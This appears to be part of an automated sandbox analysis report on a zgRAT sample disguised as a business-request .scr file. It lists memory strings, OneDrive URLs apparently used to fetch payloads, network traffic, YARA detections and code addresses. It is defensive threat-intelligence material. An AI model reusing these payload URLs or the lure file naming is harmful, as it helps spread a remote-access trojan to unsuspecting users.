Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.000000000241E000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025DF000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.472630617.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.482725847.0000000003C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.000000000213C000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002444000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002432000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000221D000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002465000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com
Source: Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=26943FEBC022618F
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, Kbojz.exe.0.dr	String found in binary or memory: https://onedrive.live.com/download?resid=26943FEBC022618F%21479&authkey=
Source: Kbojz.exe, 00000006.00000002.478817595.0000000002453000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=26943FEBC022618F%21481&authkey=
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002128000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.000000000231A000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.000000000225A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://public.am.files.1drv.com
Source: Kbojz.exe, 00000004.00000002.420766544.00000000022C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://public.am.files.1drv.com/y4mAdtlexFWsAsM5m_v175jQDQZ3JlPlheZX222y4JutpDgoqJHt5wLr_wX4GD45dXi
Source: Kbojz.exe, 00000003.00000002.407176401.000000000231A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://public.am.files.1drv.com/y4mQE8Cn-ey22tLqFzNP6Bvc0YOHW16UYVvHKAtb_HbiHHBX320gCSUBo3NE91NAaiU
Source: Kbojz.exe, 00000004.00000002.420766544.000000000225A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://public.am.files.1drv.com/y4msme9eT8kXrOR-7wV9kiBohdMur1Lbs151ysdQuqKOSsl3mAiWGdSV3LP6WqYY9va
Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Oazzuwge.tmpdb.6.dr, Stygcpda.tmpdb.6.dr, Zlxloj.tmpdb.2.dr, Buyeg.tmpdb.2.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356276020.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060CA000.00000004.00000020.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.434205628.00000000060E2000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.406017200.000000000051B000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.419345105.0000000000568000.00000004.00000020.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.485746581.00000000056CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000024E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skydrive.live.com
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002466000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000244C000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000024E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://skydrive.live.com/redir.aspx?resid=26943FEBC022618F%21481&avres=Infected&averror=SUCCESS&vin
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356481377.0000000002436000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.407176401.00000000025FD000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000004.00000002.420766544.0000000002577000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Kbojz.exe, 00000005.00000002.471133740.0000000002362000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.359012875.0000000004190000.00000004.08000000.00040000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000000.00000002.356858296.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003925000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.424766179.0000000003BE0000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000003.00000002.410066207.0000000003301000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000246E000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://utqurw.am.files.1drv.com
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.000000000246E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://utqurw.am.files.1drv.com/y4mFbMW97TPAIW_iquyB-Ao69Foeiu4Lp0Em3x5_9O_Ik0LysS9rZcK8ox-X1Eantad
Source: Kbojz.exe, 00000006.00000002.478817595.0000000002490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://utqurw.am.files.1drv.com/y4ms_vWzniFUJaBcF0Y1jNwvuu_3iedMM7s1JmtuLb_AtOzVrcYjTWzJYemZ-gol7I6
Source: Buyeg.tmpdb.2.dr	String found in binary or memory: https://www.google.com/favicon.ico
Source: Ntxfuk.tmpdb.6.dr	String found in binary or memory: https://www.google.com/search?q=net
Source: Ntxfuk.tmpdb.6.dr	String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: Ntxfuk.tmpdb.6.dr	String found in binary or memory: https://www.google.com/search?q=wmf
Source: UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.0000000002251000.00000004.00000800.00020000.00000000.sdmp, UGS - CRO REQ - KHIDUBAI (OPL-841724).scr, 00000002.00000002.420675930.00000000023F8000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002271000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.482725847.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Kbojz.exe, 00000006.00000002.478817595.0000000002418000.00000004.00000800.00020000.00000000.sdmp, Kcidab.tmpdb.6.dr, Rdlgtuxmdrq.tmpdb.2.dr, Owotczgukzq.tmpdb.2.dr, Urmvri.tmpdb.2.dr, Rgcgvjqbqci.tmpdb.6.dr, Ntxfuk.tmpdb.6.dr	String found in binary or memory: https://www.google.com/sorry/index
Source: Ntxfuk.tmpdb.6.dr	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: Ntxfuk.tmpdb.6.dr	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: Kbojz.exe, 00000006.00000002.482725847.0000000003FA2000.00000004.00000800.00020000.00000000.sdmp, Kcidab.tmpdb.6.dr, Rdlgtuxmdrq.tmpdb.2.dr, Owotczgukzq.tmpdb.2.dr, Urmvri.tmpdb.2.dr, Rgcgvjqbqci.tmpdb.6.dr, Ntxfuk.tmpdb.6.dr	String found in binary or memory: https://www.google.com/sorry/indextest
Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/about/gro.allizom.www.
Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/contribute/gro.allizom.www.
Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/firefox/central/gro.allizom.www.
Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/firefox/customize/gro.allizom.www.
Source: Eiakizpyayx.tmpdb.6.dr, Uwdvtizbx.tmpdb.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/firefox/help/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.41.11:443 -> 192.168.2.22:49184 version: TLS 1.2

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3dff8d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3edf930.9.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.4250000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e1f8f0.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.UGS - CRO REQ - KHIDUBAI (OPL-841724).scr.3e5f910.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000002.00000002.431328729.0000000004250000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Memory allocated: 770B0000 page execute and read and write

Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_004CE8E0	0_2_004CE8E0
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_004CE628	0_2_004CE628
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01EFF6B8	0_2_01EFF6B8
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01EF4790	0_2_01EF4790
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F00FA8	0_2_01F00FA8
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F0A330	0_2_01F0A330
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F0A320	0_2_01F0A320
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F1B040	0_2_01F1B040
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F10040	0_2_01F10040
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F1142C	0_2_01F1142C
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F15110	0_2_01F15110
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F150FF	0_2_01F150FF
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F14080	0_2_01F14080
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F14070	0_2_01F14070
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F10006	0_2_01F10006
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F19C60	0_2_01F19C60
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_01F19C50	0_2_01F19C50
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_046AB4B0	0_2_046AB4B0
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_046A8178	0_2_046A8178
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_046AC6B0	0_2_046AC6B0
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_046AB7D7	0_2_046AB7D7
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_046A0040	0_2_046A0040
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_046A0022	0_2_046A0022
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_04C80040	0_2_04C80040
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_04C80006	0_2_04C80006
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_058CD650	0_2_058CD650
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_058B0006	0_2_058B0006
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_058B0040	0_2_058B0040
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 0_2_058CCAA8	0_2_058CCAA8
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_001E9608	2_2_001E9608
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_001E1019	2_2_001E1019
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_001E1028	2_2_001E1028
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_004F3BF8	2_2_004F3BF8
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_004F3BD7	2_2_004F3BD7
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_006045D0	2_2_006045D0
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00607A48	2_2_00607A48
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00605600	2_2_00605600
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_006048F7	2_2_006048F7
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00619958	2_2_00619958
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00614DF8	2_2_00614DF8
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_00B2D630	2_2_00B2D630
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_04DCBF08	2_2_04DCBF08
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_04DCB2F0	2_2_04DCB2F0
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_04DCB638	2_2_04DCB638
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_04DC3770	2_2_04DC3770
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_04DC5968	2_2_04DC5968
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_04EF5DC0	2_2_04EF5DC0
Source: C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr	Code function: 2_2_04EFAEC8	2_2_04EFAEC8
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_005FE8E0	3_2_005FE8E0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_005FE628	3_2_005FE628
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_020F4798	3_2_020F4798
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_02150040	3_2_02150040
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_0215142C	3_2_0215142C
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_0215B448	3_2_0215B448
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_02150006	3_2_02150006
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_0215A058	3_2_0215A058
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_0215A068	3_2_0215A068
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_02154478	3_2_02154478
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_02154488	3_2_02154488
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_02155518	3_2_02155518
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_02155507	3_2_02155507
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_021A07C0	3_2_021A07C0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_021A9B38	3_2_021A9B38
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_021A9B28	3_2_021A9B28
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_021A07B0	3_2_021A07B0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_021AA124	3_2_021AA124
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_04D0B4A0	3_2_04D0B4A0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_04D0EEF0	3_2_04D0EEF0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_04D0C698	3_2_04D0C698
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_04D0B7C7	3_2_04D0B7C7
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_04D00040	3_2_04D00040
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_04D0001F	3_2_04D0001F
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_04D08178	3_2_04D08178
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_052C0040	3_2_052C0040
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_05C0D248	3_2_05C0D248
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_05BF003B	3_2_05BF003B
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_05BF0040	3_2_05BF0040
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 3_2_05C0C6A0	3_2_05C0C6A0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_006BE8E0	4_2_006BE8E0
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_006BE628	4_2_006BE628
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01F60048	4_2_01F60048
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01FD0040	4_2_01FD0040
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01FDB448	4_2_01FDB448
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01FD142C	4_2_01FD142C
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01FDA068	4_2_01FDA068
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01FDA058	4_2_01FDA058
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01FD0006	4_2_01FD0006
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01FD5518	4_2_01FD5518
Source: C:\Users\user\AppData\Roaming\Kbojz.exe	Code function: 4_2_01FD5507	4_2_01FD5507
